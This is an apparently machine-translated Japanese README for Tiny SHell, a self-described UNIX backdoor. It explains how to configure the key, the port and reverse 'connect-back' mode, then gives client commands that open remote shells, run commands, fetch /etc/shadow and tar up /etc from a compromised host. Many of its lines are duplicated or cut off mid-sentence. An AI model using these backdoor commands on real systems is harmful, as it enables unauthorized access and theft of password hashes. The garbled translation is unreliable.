Tiny SHell - オープンソースのUNIXバックドア


    * Tiny SHellをコンパイルする前に

        1. まず最初に、秘密鍵を設定する必要があります。
           はtsh.hに配置されています。
           鍵の長さは自由です(セキュリティを高めるために12文字以上)。

        2. SERVER_PORT（サーバが着信を待つポート）を変更することをお勧めします。
           を変更することをお勧めします。

        3. ファイアウォールボックス上で動作する場合、tshdを「connect-back」モードで起動したい場合があります。
           を「コネクトバック」モードで起動したい場合があります。
           tsh.hのCONNECT_BACK_HOSTを変更します。

    * Tiny SHellのコンパイル

        make <system>" を実行します。ここで <system> は以下のいずれかになります：
        Linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf のどれかです。

    * サーバーの使用方法

        サーバーを起動する前に、$HOMEとファイル作成マスクを設定しておくと便利です。
        を設定しておくと便利です．

            % umask 077; HOME=/var/tmp ./tshd

    * クライアントの使用方法

        リモートホスト上でtshdが動作していることを確認します。できます：
       

        - シェルを起動します：

            ./tsh <ホスト名

        - コマンドを実行します：

            ./tsh <ホスト名>"uname -a"

        - ファイルを転送する：

            ./tsh <ホスト名> get /etc/shadow .
            ./tsh <ホスト名> put vmlinuz /ブート

        注：サーバーがコネクトバックモードで動作している場合、リモートマシンのホスト名を
        リモートマシンのホスト名を "cb "に置き換えてください。

    * 複数のファイル転送について

        現時点では、Tiny SHellはscpのような複数のファイル転送や再帰的なファイル転送をサポートしていません。
        または再帰的なファイル転送をサポートしていません。このバグを回避するには
        このバグを回避するために、単純にtarアーカイブを作成し、それを転送することができます。例を挙げます：

        ./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf - 。

    * ターミナルモードについて

        一部の脳死システム（実際にはIRIXとHP-UX）では、Ctrl-C
        などのコントロールキーが正しく動作しないことがあります。で修正する：

            % stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U" です。

    * セキュリティについて

        秘密鍵は、tshとtshdの実行ファイルの内部でクリアに保存されることを忘れないでください。
        秘密鍵はtshとtshdの実行ファイル内にクリアで保存されることを忘れないでください。
        このため、この2つのファイルに対して、あなた以外の誰も読 み取りアクセスができないようにする必要があります。
        しかし、本当の (有効な) 鍵をクライアントに保存しないようにすることもできます。
        この場合、クライアントは起動時にパスワードを要求します。